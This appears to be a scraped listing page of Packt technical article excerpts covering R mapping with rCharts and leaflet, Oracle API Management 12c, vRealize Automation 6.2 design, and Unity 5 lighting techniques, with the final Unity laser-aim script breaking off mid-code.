rCharts package was developed by Ramnath Vaidyanathan, and includes some methods to create a new object, set the viewport and zoom level, add some points or polygons to the map, and then render or print the generated HTML and JavaScript code to the console or to a file. Unfortunately, this package is not on CRAN yet, so you have to install it from GitHub: > devtools::install_github('ramnathv/rCharts') As a quick example, let's generate a Leaflet map of the airports with some tooltips, like we did with the Google Maps API in the previous section. As the setView method expects numeric geo-coordinates as the center of the map, we will use Kansas City's airport as a reference: > library(rCharts) > map <- Leaflet$new() > map$setView(as.numeric(dt[which(dt$Dest == 'MCI'), + c('lat', 'lon')]), zoom = 4) > for (i in 1:nrow(dt)) + map$marker(c(dt$lat[i], dt$lon[i]), bindPopup = dt$tip[i]) > map$show() Similarly, RStudio's leaflet package and the more general htmlwidgets package also provide some easy ways to generate JavaScript-powered data visualizations. Let's load the library and define the steps one by one using the pipe operator from the magrittr package, which is pretty standard for all packages created or inspired by RStudio or Hadley Wickham: > library(leaflet) > leaflet(us) %>% + addProviderTiles("Acetate.terrain") %>% + addPolygons() %>% + addMarkers(lng = dt$lon, lat = dt$lat, popup = dt$tip) I especially like this latter map, as we can load a third-party satellite map in the background, then render the states as polygons; we also added the original data points along with some useful tooltips on the very same map with literally a one-line R command. We could even color the state polygons based on the aggregated results we computed in the previous sections! Ever tried to do the same in Java? Alternative map designs Besides being able to use some third-party tools, another main reason why I tend to use R for all my data analysis tasks is that R is extremely powerful in creating custom data exploration, visualization, and modeling designs. As an example, let's create a flow-map based on our data, where we will highlight the flights from Houston based on the number of actual and cancelled flights. We will use lines and circles to render these two variables on a 2-dimensional map, and we will also add a contour plot in the background based on the average time delay. But, as usual, let's do some data transformations first! To keep the number of flows at a minimal level, let's get rid of the airports outside the USA at last: > dt <- dt[point.in.polygon(dt$lon, dt$lat, + usa_data$x, usa_data$y) == 1, ] We will need the diagram package (to render curved arrows from Houston to the destination airports) and the scales package to create transparent colors: > library(diagram) > library(scales) Then let's render the contour map described in the Contour Lines section: > map("usa") > title('Number of flights, cancellations and delays from Houston') > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) And then add a curved line from Houston to each of the destination airports, where the width of the line represents the number of cancelled flights and the diameter of the target circles shows the number of actual flights: > for (i in 1:nrow(dt)) { + curvedarrow( + from = rev(as.numeric(h)), + to = as.numeric(dt[i, c('lon', 'lat')]), + arr.pos = 1, + arr.type = 'circle', + curve = 0.1, + arr.col = alpha('black', dt$N[i] / max(dt$N)), + arr.length = dt$N[i] / max(dt$N), + lwd = dt$Cancelled[i] / max(dt$Cancelled) * 25, + lcol = alpha('black', + dt$Cancelled[i] / max(dt$Cancelled))) + } Well, this article ended up being about visualizing spatial data, and not really about analyzing spatial data by fitting models and filtering raw data. Summary In case you are interested in knowing other R-related books that Packt has in store for you, here is the link: R for Data Science Practical Data Science Cookbook Resources for Article: Further resources on this subject: R ─ Classification and Regression Trees[article] An overview of common machine learning tasks[article] Reduction with Principal Component Analysis [article]
Read more
  • 0
  • 0
  • 2453

article-image-oracle-api-management-implementation-12c
Packt
29 Sep 2015
5 min read
Save for later

Oracle API Management Implementation 12c

Packt
29 Sep 2015
5 min read
 This article by Luis Augusto Weir, the author of the book, Oracle API Management 12c Implementation, gives you a gist of what is covered in the book. At present, the digital transformation is essential for any business strategy, regardless of the industry they belong to an organization. (For more resources related to this topic, see here.) The companies who embark on a journey of digital transformation, they become able to create innovative and disruptive solutions; this in order to deliver a user experience much richer, unified, and personalized at lower cost. These organizations are able to address customers dynamically and across a wide variety of channels, such as mobile applications, highly responsive websites, and social networks. Ultimately, companies that develop models aligned digital innovation business, acquire a considerable competitive advantage over those that do not. The main trigger for this transformation is the ability to expose and make available business information and key technological capabilities for this, which often are buried in information systems (EIS) of the organization, or in components integration are only visible internally. In the digital economy, it is highly desirable to realize those assets in a standardized way through APIs, this course, in a controlled, scalable, and secure environment. The lightweight nature and ease of finding/using these APIs greatly facilitates its adoption as the essential mechanism to expose and/or consume various features from a multichannel environment. API Management is the discipline that governs the development cycle of APIs, defining the tools and processes needed to build, publish, and operate, also including management development communities around them. Our recent book, API Management Oracle 12c (Luis Weir, Andrew Bell, Rolando Carrasco, Arturo Viveros), is a very comprehensive and detailed to implement API Management in an organization guide. In this book, he explains the relationship that keeps this discipline with concepts such great detail as SOA Governance and DevOps .The convergence of API Management with SOA and governance of such services is addressed particularly to explain and shape the concept of Application Services Governance (ESG). On the other hand, it highlights the presence of case studies based on real scenarios, with multiple examples to demonstrate the correct definition and implementation of a robust strategy in solving supported Oracle Management API. The book begins by describing a number of key concepts about API Management and contextualizing the complementary disciplines, such as SOA Governance, DevOps, and Enterprise Architecture (EA). This is in order to clear up any confusion about the relationship to these topics. Then, all these concepts are put into practice by defining the case study of an organization with real name, which previously dealt with successfully implementing a service-oriented architecture considering the government of it, and now It is the need/opportunity to extend its technology platform by implementing a strategy of API Management. Throughout the narrative of the case are also described: Business requirements justifying the adoption of API Management The potential impact of the proposed solution on the organization The steps required to design and implement the strategy The definition and implementation of the assessment of maturity (API Readiness) and analysis of gaps in terms of: people, tools, and technology The exercise of evaluation and selection of products, explaining the choice of Oracle as the most appropriate solution The implementation roadmap API Management In later chapters, the various steps are being addressed one by one needed to solve the raised stage, by implementing the following reference architecture for API Management, based on the components of the Oracle solution: Catalog API, API Manager, and API Gateway. In short, the book will enable the reader to acquire a number of advanced knowledge on the following topics: API Management, its definition, concepts, and objectives Differences and similarities between API Management and SOA Governance; where and how these two disciplines converge in the concept of ESG Application Services Governance[d1]  and how to define a framework aimed at ASG Definition and implementation of the assessment of maturity for API Management Criteria for the selection and evaluation tools; Why Oracle API Management Suite? Implementation of Oracle API Catalog (OAC), including OAC harvesting by bootstrapping & ANT scripts and JDev, OAC Console, user creation and management, metadata API, API Discovery, and how to extend the functionality of OAC REX by API. Management APIs and challenges in general API Management Oracle Implementation Manager API (OAPIM), including the creation, publishing, monitoring, subscription, and life cycle management APIs by OAPIM Portal Common scenarios for adoption/implementation of API Management and how to solve them[d2]  Implementation of Oracle API Gateway (OAG), including creation of policies with different filters, OAuth authentication, integration with LDAP, SOAP/REST APIs conversions, and Testing. Defining the deployment topology for Oracle API Management Suite Installing and configuring OAC, OAPIM, and OAG 12c Oracle Management API is designed for the following audience: Enterprise Architects, Solution Architects, Technical Leader and SOA and APIs professionals seeking to know thoroughly and successfully implement the Oracle API Management solution. Summary In this article, we looked at Oracle API Management Implementation 12c in brief. More information on this is provided in the book. Resources for Article: Further resources on this subject: Oracle 12c SQL and PL/SQL New Features[article] Securing Data at Rest in Oracle 11g[article] Getting Started with Oracle Primavera P6 [article]
Read more
  • 0
  • 0
  • 4859

article-image-designing-and-building-vrealize-automation-62-infrastructure
Packt
29 Sep 2015
16 min read
Save for later

Designing and Building a vRealize Automation 6.2 Infrastructure

Packt
29 Sep 2015
16 min read
 In this article by J. Powell, the author of the book Mastering vRealize Automation 6.2, we put together a design and build vRealize Automation 6.2 from POC to production. With the knowledge gained from this article, you should feel comfortable installing and configuring vRA. In this article, we will be covering the following topics: Proving the technology Proof of Concept Proof of Technology Pilot Designing the vRealize Automation architecture (For more resources related to this topic, see here.) Proving the technology In this section, we are going to discuss how to approach a vRealize Automation 6.2 project. This is a necessary component in order to assure a successful project, and it is specifically necessary when we discuss vRA, due to the sheer amount of moving parts that comprise the software. We are going to focus on the end users, whether they are individuals or business units, such as your company's software development department. These are the people that will be using vRA to provide the speed and agility necessary to deliver results that drive the business and make money. If we take this approach and treat our co-workers as customers, we can give them what they need to perform their jobs as opposed to what we perceive they need from an IT perspective. Designing our vRA deployment around the user and business requirements, first gives us a better plan to implement the backend infrastructure as well as the service offerings within the vRA web portal. This allows us to build a business case for vRealize Automation and will help determine which of the three editions will make sense to meet these needs. Once we have our business case created, validated, and approved, we can start testing vRealize Automation. There are three common phases to a testing cycle: Proof of Concept Proof of Technology Pilot implementation We will cover these phases in the following sections and explore whether you need them for your vRealize Automation 6.2 deployment. Proof of Concept A POC is typically an abbreviated version of what you hope to achieve during production. It is normally spun up in a lab, using old hardware, with a limited number of test users. Once your POC is set up, one of two things happen. First, nothing happens or it gets decommissioned. After all, it's just the IT department getting their hands dirty with new technology. This also happens when there is not a clear business driver, which provides a reason to have the technology in a production environment. The second thing that could happen is that the technology is proven, and it moves into a pilot phase. Of course, this is completely up to you. Perhaps, a demonstration of the technology will be enough, or testing some limited outcomes in VMware's HOL for vRealize Automation 6.2 will do the trick. Due to the number of components and features within vRA, it is strongly recommended that you create a POC, documenting the process along the way. This will give you a strong base if you take the project from POC to production. Proof of Technology The object of a POT project is to determine whether the proposed solution or technology will integrate in your existing IT landscape and add value. This is the stage where it is important to document any technical issues you encounter in your individual environment. There is no need to involve pilot users in this process as it is specifically to validate the technical merits of the software. Pilot implementation A pilot is a small scale and targeted roll out of the technology in a production environment. Its scope is limited, typically by a number of users and systems. This is to allow testing, so as to make sure the technology works as expected and designed. It also limits the business risk. A pilot deployment in terms of vRA is also a way to gain feedback from the users who will ultimately use it on a regular basis. vRealize Automation 6.2 is a product that empowers the end users to provision everything as a service. How the users feel about the layout of the web portal, user experience, and automated feedback from the system directly impacts how well the product will work in a full-blown production scenario. This also gives you time to make any necessary modifications to the vRA environment before providing access to additional users. When designing the pilot infrastructure, you should use the same hardware that is used during production. This includes ESXi hosts, storage, fiber or Internet Small Computer System Interface (iSCSI) connectivity, and vCenter versions. This will take into account any variances between platforms and configurations that could affect performance. Even at this stage, design, attention to detail, and following VMware best practices is key. Often, pilot programs get rolled straight into production. Adhering to these concepts will put you on the right path to a successful deployment. To get a better understanding, let's look at some of the design elements that should be considered: Size of the deployment: A small deployment will support 10,000 managed machines, 500 catalog items, and 10 concurrent deployments. Concurrent provisioning: Only two concurrent provisions per endpoint are allowed by default. You may want to increase this limit to suit your requirements. Hardware sizing: This refers to the number of servers, the CPU, and the memory. Scale: This refers to whether there will be multiple Identity and vRealize Automation vApps. Storage: This refers to pools of storage from Storage Area Network (SAN) or Network Attached Storage (NAS) and tiers of storage for performance requirements. Network: This refers to LANs, load balancing, internal versus external access to web portals, and IP pools for use with the infrastructure provisioned through vRA. Firewall: This refers to knowing what ports need to be opened between the various components that make up vRA, as well as the other endpoint that may fall under vRA's purview. Portal layout: This refers to the items you want to provide to the end user and the manner in which you categorize them for future growth. IT Business Management Suite Standard Edition: If you are going to implement this product, it can scale up to 20,000 VMs across four vCenter servers. Certificates: Appliances can be self-signed, but it is recommended to use an internal Certificate Authority for vRA components and an externally signed certificate to use on the vRA web portal if it is going to be exposed to the public Internet. VMware has published a Technical White Paper that covers all the details and considerations when deploying vRA. You can download the paper by visiting http://www.vmware.com/files/pdf/products/vCloud/VMware-vCloud-Automation-Center-61-Reference-Architecture.pdf. VMware provides the following general recommendation when deploying vRealize Automation: keep all vRA components in the same time zone with their clocks synced. If you plan on using VMware IT Business Management Suite Standard Edition, deploy it in the same LAN as vCenter. You can deploy Worker DEMs and proxy agents over the WAN, but all other components should not go over the WAN, as to prevent performance degradation. Here is a diagram of the pilot process: Designing the vRealize Automation architecture We have discussed the components that comprise vRealize Automation as well as some key design elements. Now, let's see some of the scenarios at a high level. Keep in mind that vRA is designed to manage tens of thousands of VMs in an infrastructure. Depending on your environment, you may never exceed the limitations of what VMware considers to be a small deployment. The following diagram displays the minimum footprint needed for small deployment architecture: A medium deployment can support up to 30,000 managed machines, 1,000 catalog items, and 50 concurrent deployments. The following diagram shows you the minimum required footprint for a medium deployment: Large deployments support 50,000 managed machines, 2,500 catalog items, and 100 concurrent deployments. The following diagram shows you the minimum required footprint for a large deployment: Design considerations Now that we understand the design elements for a small, medium, and large infrastructure, let's explore the components of vRA and build an example design, based on the small infrastructure requirements from VMware. Since there are so many options and components, we have broken them down into easily digestible components. Naming conventions It is important to give some thought to naming conventions for different aspects of the vRA web portal. Your company has probably set a naming convention for servers and environments, and we will have to make sure items provisioned from vRA adhere to those standards. It is important to name the different components of vRealize Automation in a method that makes sense for what your end goal may be regarding what vRA will do. This is necessary because it is not easy (and in some cases not possible) to rename the elements of the vRA web portal once you have implemented them. Compute resources Compute resources in terms of vRA refers to an object that represents a host, host cluster, virtual data center, or a public Cloud region, such as Amazon, where machines and applications can be provisioned. For example, compute resources can refer to vCenter, Hyper-V, or Amazon AWS. This list grows with each subsequent release of vRA. Business and Fabric groups A Business group in the vRA web portal is a set of services and resources assigned to a set of users. Quite simply, it is a way to align a business department or unit with the resources it needs. For example, you may have a Business group named Software Developers, and you would want them to be able to provision SQL 2012 and 2014 on Windows 2012 R2 servers. Fabric groups enable IT administrators to provide resources from your infrastructure. You can add users or groups to the Fabric group in order to manage the infrastructure resources you have assigned. For example, if you have a software development cluster in vCenter, you could create a Fabric group that contains the users responsible for the management of this cluster to oversee the cluster resources. Endpoints and credentials Endpoints can represent anything from vCenter, to storage, physical servers, and public Cloud offerings, such as Amazon AWS. The platform address is defined with the endpoint (in terms of being accessed through a web browser) along with the credentials needed to manage them. Reservations Reservations refer to how we provide a portion of our total infrastructure that is to be used for consumption by end users. It is a key design element in the vRealize Automation 6.2 infrastructure design. Each reservation created will need to define the disk, memory, networking, and priority. The lower their number, the higher will be the priority. This is to resolve conflicts in case there are multiple matching reservations. If the priorities of the multiple reservations are equal, vRA will choose a reservation in a round-robin style order: In the preceding diagram, on the far right-hand side, we can see that we have Shared Infrastructure composed of Private Physical and Private Virtual space, as well as a portion of a Public Cloud offering. By creating different reservations, we can assure that there is enough infrastructure for the business, while providing a dedicated portion of the total infrastructure to our end users. Reservation policies A reservation policy is a set of reservations that you can select from a blueprint to restrict provisioning only to specific reservations. Reservation policies are then attached to a reservation. An example of reservations policies can be taken when using them to create different storage policies. You can create a separate Bronze, Silver, and Gold policy to reflect the type of disk available on our SAN (such as SATA, SAS, and SDD). Network profiles By default, vRA will assign an IP address from a DHCP server to all the machines it provisions. However, most production environments do not use DHCP for their servers. A network profile will need to be created to allocate and assign static IPs to these servers. Network profile options consist of external, private, NAT (short for Network Address Translation), and routed. For the scope of our examples, we will focus on the external option. Compute resources Compute resources are tied in with Fabric groups, endpoints, storage reservation policies, and cost profiles. You must have these elements created before you can configure compute resources, although some components, such as storage and cost profiles, are optional. An example of a compute resource is a vCenter cluster. It is created automatically when you add an endpoint to the vRA web portal. Blueprints Blueprints are instruction sets to build virtual, physical, and Cloud-based machines, as well vApps. Blueprints define a machine or a set of application properties, the way it is provisioned, and its policy and management settings. For an end user, a blueprint is listed as an item in the Service Catalog tab. The user can request the item, and vRA would use the blueprint to provision the user's request. Blueprints also provide a way to prompt the user making the request for additional items, such as more compute resources, application or machine names, as well as network information. Of course, this can be automated as well and will probably be the preferred method in your environment. Blueprints also contain workflow logic. vRealize Automation contains built-in workflows for cloning snapshots, Kickstart, ISO, SCCM, and WIM deployments. You can define a minimum and maximum for CPU, memory, and storage. This will give end users the option to customize their machines to match their individual needs. It is a best practice to define the minimum for servers with very low resources, such as 1 vCPU and 512 MB for memory. It is easy to hot add these resources if the end user needs more compute after an initial request. However, if you set the minimum resources too high in the blueprint, you cannot lower the value. You will have to create a new blueprint. You can also define customized properties in the blueprints. For example, if you want to provide a VM with a defined MAC address or without a virtual CD-ROM attached, you can do so. VMware has published a detailed guide of the Custom Properties and their values. You can find it at http://pubs.vmware.com/vra-62/topic/com.vmware.ICbase/PDF/vrealize-automation-62-custom-properties.pdf. Custom Properties are case sensitive. It is recommended to test Custom Properties individually until you are comfortable using them. For example, a blueprint referencing an ISO workflow would fail if you have a Custom Property to remove the CD-ROM. Users and groups Users and groups are defined in the Administration section of the vRA web portal. This is where we would assign vRA specific roles to groups. It is worth mentioning when you login to the vRA web portal and click on users, it is blank. This is because of the sheer number of users that could be potentially allowed to access the portal and would slow the load time. In our examples, we will focus on users and groups from our Identity Appliance that ties in to Active Directory. Catalog management Catalog management consists of services, catalog items, actions, and entitlement. We will discuss them in more detail in the following sections. Services Services are another key design element and are defined by the vRA administrators to help group subsets of your environment. For example, you may have services defined for applications, where you would list items, such as SQL and Oracle databases. You could also create a service called OperatingSystems where you would group catalog items, such as Linux and Windows. You can make these services active or inactive, and also define maintenance windows when catalog items under this category would be unavailable for provisioning. Catalog items Catalog items are essentially links back to blueprints. These items are tied back to a service that you previously defined and helped shape the Service Catalog tab that the end user will use to provision machines and applications. Also, you will entitle users to use the catalog item. Entitlements As mentioned previously, entitlements are how we link business users and groups to services, catalog items, and actions. Actions Actions are a list of operations that gives a user the ability to perform certain tasks with services and catalog items. There are over 30 out of the box action items that come with vRA. This includes creating and destroying VMs, changing the lease time, as well as adding additional compute resources. You also have the option of creating custom actions as well. Approval policies Approval policies are the sets of rules that govern the use of catalog items. They can be used in the pre or post configuration life cycle of an item. Let's say, as an example, we have a Red Hat Linux VM that a user can provision. We have set the minimum vCPU to 1, but have defined a maximum of 4. We would want to notify the user's manager and the IT team when a request to provision the VM exceeds the minimum vCPU we have defined. We could create an approval policy to perform a pre-check to see if the user is requesting more than one vCPU. If the threshold is exceeded, an e-mail will be sent out to approve the additional vCPU resources. Until the notification is approved, the VM will not be provisioned. Advanced services Advanced services is an area of the vRA web portal where we can tie in customized workflows from vRealize Orchestrator. For example, we may need to check for a file in the VM's operating system once it has been deployed. We need to do this to make sure that an application has been deployed successfully or a baseline compliance is in order. We can present vRealize Orchestrator workflows for end users to leverage in almost the same manner as we do IaaS. Summary In this article, we covered the design and build principles of vRealize Automation 6.2. We discussed how to prove the technology by performing due diligence checks with the business users and creating a case to implement a POC. We detailed considerations when rolling out vRA in a pilot program and showed you how to gauge its success. Lastly, we detailed the components that comprise the design and build of vRealize Automation, while introducing additional elements. Resources for Article: Further resources on this subject: vROps – Introduction and Architecture[article] An Overview of Horizon View Architecture and its Components[article] Master Virtual Desktop Image Creation [article]
Read more
  • 0
  • 0
  • 6430

article-image-lights-and-effects
Packt
29 Sep 2015
27 min read
Save for later

Lights and Effects

Packt
29 Sep 2015
27 min read
 In this article by Matt Smith and Chico Queiroz, authors of Unity 5.x Cookbook, we will cover the following topics: Using lights and cookie textures to simulate a cloudy day Adding a custom Reflection map to a scene Creating a laser aim with Projector and Line Renderer Reflecting surrounding objects with Reflection Probes Setting up an environment with Procedural Skybox and Directional Light (For more resources related to this topic, see here.) Introduction Whether you're willing to make a better-looking game, or add interesting features, lights and effects can boost your project and help you deliver a higher quality product. In this article, we will look at the creative ways of using lights and effects, and also take a look at some of Unity's new features, such as Procedural Skyboxes, Reflection Probes, Light Probes, and custom Reflection Sources. Lighting is certainly an area that has received a lot of attention from Unity, which now features real-time Global Illumination technology provided by Enlighten. This new technology provides better and more realistic results for both real-time and baked lighting. For more information on Unity's Global Illumination system, check out its documentation at http://docs.unity3d.com/Manual/GIIntro.html. The big picture There are many ways of creating light sources in Unity. Here's a quick overview of the most common methods. Lights Lights are placed into the scene as game objects, featuring a Light component. They can function in Realtime, Baked, or Mixed modes. Among the other properties, they can have their Range, Color, Intensity, and Shadow Type set by the user. There are four types of lights: Directional Light: This is normally used to simulate the sunlight Spot Light: This works like a cone-shaped spot light Point Light: This is a bulb lamp-like, omnidirectional light Area Light: This baked-only light type is emitted in all directions from a rectangle-shaped entity, allowing for a smooth, realistic shading For an overview of the light types, check Unity's documentation at http://docs.unity3d.com/Manual/Lighting.html. Different types of lights Environment Lighting Unity's Environment Lighting is often achieved through the combination of a Skybox material and sunlight defined by the scene's Directional Light. Such a combination creates an ambient light that is integrated into the scene's environment, and which can be set as Realtime or Baked into Lightmaps. Emissive materials When applied to static objects, materials featuring the Emission colors or maps will cast light over surfaces nearby, in both real-time and baked modes, as shown in the following screenshot: Projector As its name suggests, a Projector can be used to simulate projected lights and shadows, basically by projecting a material and its texture map onto the other objects. Lightmaps and Light Probes Lightmaps are basically texture maps generated from the scene's lighting information and applied to the scene's static objects in order to avoid the use of processing-intensive real-time lighting. Light Probes are a way of sampling the scene's illumination at specific points in order to have it applied onto dynamic objects without the use of real-time lighting. The Lighting window The Lighting window, which can be found through navigating to the Window | Lighting menu, is the hub for setting and adjusting the scene's illumination features, such as Lightmaps, Global Illumination, Fog, and much more. It's strongly recommended that you take a look at Unity's documentation on the subject, which can be found at http://docs.unity3d.com/Manual/GlobalIllumination.html. Using lights and cookie textures to simulate a cloudy day As it can be seen in many first-person shooters and survival horror games, lights and shadows can add a great deal of realism to a scene, helping immensely to create the right atmosphere for the game. In this recipe, we will create a cloudy outdoor environment using cookie textures. Cookie textures work as masks for lights. It functions by adjusting the intensity of the light projection to the cookie texture's alpha channel. This allows for a silhouette effect (just think of the bat-signal) or, as in this particular case, subtle variations that give a filtered quality to the lighting. Getting ready If you don't have access to an image editor, or prefer to skip the texture map elaboration in order to focus on the implementation, please use the image file called cloudCookie.tga, which is provided inside the 1362_06_01 folder. How to do it... To simulate a cloudy outdoor environment, follow these steps: In your image editor, create a new 512 x 512 pixel image. Using black as the foreground color and white as the background color, apply the Clouds filter (in Photoshop, this is done by navigating to the Filter | Render | Clouds menu). Learning about the Alpha channel is useful, but you could get the same result without it. Skip steps 3 to 7, save your image as cloudCookie.png and, when changing texture type in step 9, leave Alpha from Greyscale checked. Select your entire image and copy it. Open the Channels window (in Photoshop, this can be done by navigating to the Window | Channels menu). There should be three channels: Red, Green, and Blue. Create a new channel. This will be the Alpha channel. In the Channels window, select the Alpha 1 channel and paste your image into it. Save your image file as cloudCookie.PSD or TGA. Import your image file to Unity and select it in the Project view. From the Inspector view, change its Texture Type to Cookie and its Light Type to Directional. Then, click on Apply, as shown: We will need a surface to actually see the lighting effect. You can either add a plane to your scene (via navigating to the GameObject | 3D Object | Plane menu), or create a Terrain (menu option GameObject | 3D Object | Terrain) and edit it, if you so you wish. Let's add a light to our scene. Since we want to simulate sunlight, the best option is to create a Directional Light. You can do this through the drop-down menu named Create | Light | Directional Light in the Hierarchy view. Using the Transform component of the Inspector view, reset the light's Position to X: 0, Y: 0, Z: 0 and its Rotation to X: 90; Y: 0; Z: 0. In the Cookie field, select the cloudCookie texture that you imported earlier. Change the Cookie Size field to 80, or a value that you feel is more appropriate for the scene's dimension. Please leave Shadow Type as No Shadows. Now, we need a script to translate our light and, consequently, the Cookie projection. Using the Create drop-down menu in the Project view, create a new C# Script named MovingShadows.cs. Open your script and replace everything with the following code: using UnityEngine; using System.Collections; public class MovingShadows : MonoBehaviour{ public float windSpeedX; public float windSpeedZ; private float lightCookieSize; private Vector3 initPos; void Start(){ initPos = transform.position; lightCookieSize = GetComponent<Light>().cookieSize; } void Update(){ Vector3 pos = transform.position; float xPos= Mathf.Abs (pos.x); float zPos= Mathf.Abs (pos.z); float xLimit = Mathf.Abs(initPos.x) + lightCookieSize; float zLimit = Mathf.Abs(initPos.z) + lightCookieSize; if (xPos >= xLimit) pos.x = initPos.x; if (zPos >= zLimit) pos.z = initPos.z; transform.position = pos; float windX = Time.deltaTime * windSpeedX; float windZ = Time.deltaTime * windSpeedZ; transform.Translate(windX, 0, windZ, Space.World); } } Save your script and apply it to the Directional Light. Select the Directional Light. In the Inspector view, change the parameters Wind Speed X and Wind Speed Z to 20 (you can change these values as you wish, as shown). Play your scene. The shadows will be moving. How it works... With our script, we are telling the Directional Light to move across the X and Z axis, causing the Light Cookie texture to be displaced as well. Also, we reset the light object to its original position whenever it traveled a distance that was either equal to or greater than the Light Cookie Size. The light position must be reset to prevent it from traveling too far, causing problems in real-time render and lighting. The Light Cookie Size parameter is used to ensure a smooth transition. The reason we are not enabling shadows is because the light angle for the X axis must be 90 degrees (or there will be a noticeable gap when the light resets to the original position). If you want dynamic shadows in your scene, please add a second Directional Light. There's more... In this recipe, we have applied a cookie texture to a Directional Light. But what if we were using the Spot or Point Lights? Creating Spot Light cookies Unity documentation has an excellent tutorial on how to make the Spot Light cookies. This is great to simulate shadows coming from projectors, windows, and so on. You can check it out at http://docs.unity3d.com/Manual/HOWTO-LightCookie.html. Creating Point Light Cookies If you want to use a cookie texture with a Point Light, you'll need to change the Light Type in the Texture Importer section of the Inspector. Adding a custom Reflection map to a scene Whereas Unity Legacy Shaders use individual Reflection Cubemaps per material, the new Standard Shader gets its reflection from the scene's Reflection Source, as configured in the Scene section of the Lighting window. The level of reflectiveness for each material is now given by its Metallic value or Specular value (for materials using Specular setup). This new method can be a real time saver, allowing you to quickly assign the same reflection map to every object in the scene. Also, as you can imagine, it helps keep the overall look of the scene coherent and cohesive. In this recipe, we will learn how to take advantage of the Reflection Source feature. Getting ready For this recipe, we will prepare a Reflection Cubemap, which is basically the environment to be projected as a reflection onto the material. It can be made from either six or, as shown in this recipe, a single image file. To help us with this recipe, it's been provided a Unity package, containing a prefab made of a 3D object and a basic Material (using a TIFF as Diffuse map), and also a JPG file to be used as the reflection map. All these files are inside the 1362_06_02 folder. How to do it... To add Reflectiveness and Specularity to a material, follow these steps: Import batteryPrefab.unitypackage to a new project. Then, select battery_prefab object from the Assets folder, in the Project view. From the Inspector view, expand the Material component and observe the asset preview window. Thanks to the Specular map, the material already features a reflective look. However, it looks as if it is reflecting the scene's default Skybox, as shown: Import the CustomReflection.jpg image file. From the Inspector view, change its Texture Type to Cubemap, its Mapping to Latitude - Longitude Layout (Cylindrical), and check the boxes for Glossy Reflection and Fixup Edge Seams. Finally, change its Filter Mode to Trilinear and click on the Apply button, shown as follows: Let's replace the Scene's Skybox with our newly created Cubemap, as the Reflection map for our scene. In order to do this, open the Lighting window by navigating to the Window | Lighting menu. Select the Scene section and use the drop-down menu to change the Reflection Source to Custom. Finally, assign the newly created CustomReflection texture as the Cubemap, shown as follows: Check out for the new reflections on the battery_prefab object. How it works... While it is the material's specular map that allows for a reflective look, including the intensity and smoothness of the reflection, the refection itself (that is, the image you see on the reflection) is given by the Cubemap that we have created from the image file. There's more... Reflection Cubemaps can be achieved in many ways and have different mapping properties. Mapping coordinates The Cylindrical mapping that we applied was well-suited for the photograph that we used. However, depending on how the reflection image is generated, a Cubic or Spheremap-based mapping can be more appropriate. Also, note that the Fixup Edge Seams option will try to make the image seamless. Sharp reflections You might have noticed that the reflection is somewhat blurry compared to the original image; this is because we have ticked the Glossy Reflections box. To get a sharper-looking reflection, deselect this option; in which case, you can also leave the Filter Mode option as default (Bilinear). Maximum size At 512 x 512 pixels, our reflection map will probably run fine on the lower-end machines. However, if the quality of the reflection map is not so important in your game's context, and the original image dimensions are big (say, 4096 x 4096), you might want to change the texture's Max Size at the Import Settings to a lower number. Creating a laser aim with Projector and Line Renderer Although using GUI elements, such as a cross-hair, is a valid way to allow players to aim, replacing (or combining) it with a projected laser dot might be a more interesting approach. In this recipe, we will use the Projector and Line components to implement this concept. Getting ready To help us with this recipe, it's been provided with a Unity package containing a sample scene featuring a character holding a laser pointer, and also a texture map named LineTexture. All files are inside the 1362_06_03 folder. Also, we'll make use of the Effects assets package provided by Unity (which you should have installed when installing Unity). How to do it... To create a laser dot aim with a Projector, follow these steps: Import BasicScene.unitypackage to a new project. Then, open the scene named BasicScene. This is a basic scene, featuring a player character whose aim is controlled via mouse. Import the Effects package by navigating to the Assets | Import Package | Effects menu. If you want to import only the necessary files within the package, deselect everything in the Importing package window by clicking on the None button, and then check the Projectors folder only. Then, click on Import, as shown: From the Inspector view, locate the ProjectorLight shader (inside the Assets | Standard Assets | Effects | Projectors | Shaders folder). Duplicate the file and name the new copy as ProjectorLaser. Open ProjectorLaser. From the first line of the code, change Shader "Projector/Light" to Shader "Projector/Laser". Then, locate the line of code – Blend DstColor One and change it to Blend One One. Save and close the file. The reason for editing the shader for the laser was to make it stronger by changing its blend type to Additive. However, if you want to learn more about it, check out Unity's documentation on the subject, which is available at http://docs.unity3d.com/Manual/SL-Reference.html. Now that we have fixed the shader, we need a material. From the Project view, use the Create drop-down menu to create a new Material. Name it LaserMaterial. Then, select it from the Project view and, from the Inspector view, change its Shader to Projector/Laser. From the Project view, locate the Falloff texture. Open it in your image editor and, except for the first and last columns column of pixels that should be black, paint everything white. Save the file and go back to Unity. Change the LaserMaterial's Main Color to red (RGB: 255, 0, 0). Then, from the texture slots, select the Light texture as Cookie and the Falloff texture as Falloff. From the Hierarchy view, find and select the pointerPrefab object (MsLaser | mixamorig:Hips | mixamorig:Spine | mixamorig:Spine1 | mixamorig:Spine2 | mixamorig:RightShoulder | mixamorig:RightArm | mixamorig:RightForeArm | mixamorig:RightHand | pointerPrefab). Then, from the Create drop-down menu, select Create Empty Child. Rename the new child of pointerPrefab as LaserProjector. Select the LaserProjector object. Then, from the Inspector view, click the Add Component button and navigate to Effects | Projector. Then, from the Projector component, set the Orthographic option as true and set Orthographic Size as 0.1. Finally, select LaserMaterial from the Material slot. Test the scene. You will be able to see the laser aim dot, as shown: Now, let's create a material for the Line Renderer component that we are about to add. From the Project view, use the Create drop-down menu to add a new Material. Name it as Line_Mat. From the Inspector view, change the shader of the Line_Mat to Particles/Additive. Then, set its Tint Color to red (RGB: 255;0;0). Import the LineTexture image file. Then, set it as the Particle Texture for the Line_Mat, as shown: Use the Create drop-down menu from Project view to add a C# script named LaserAim. Then, open it in your editor. Replace everything with the following code: using UnityEngine; using System.Collections; public class LaserAim : MonoBehaviour { public float lineWidth = 0.2f; public Color regularColor = new Color (0.15f, 0, 0, 1); public Color firingColor = new Color (0.31f, 0, 0, 1); public Material lineMat; private Vector3 lineEnd; private Projector proj; private LineRenderer line; void Start () { line = gameObject.AddComponent<LineRenderer>(); line.material = lineMat; line.material.SetColor("_TintColor", regularColor); line.SetVertexCount(2); line.SetWidth(lineWidth, lineWidth); proj = GetComponent<Projector> (); } void Update () { RaycastHit hit; Vector3 fwd = transform.TransformDirection(Vector3.forward); if (Physics.Raycast (transform.position, fwd, out hit)) { lineEnd = hit.point; float margin = 0.5f; proj.farClipPlane = hit.distance + margin; } else { lineEnd = transform.position + fwd * 10f; } line.SetPosition(0, transform.position); line.SetPosition(1, lineEnd); 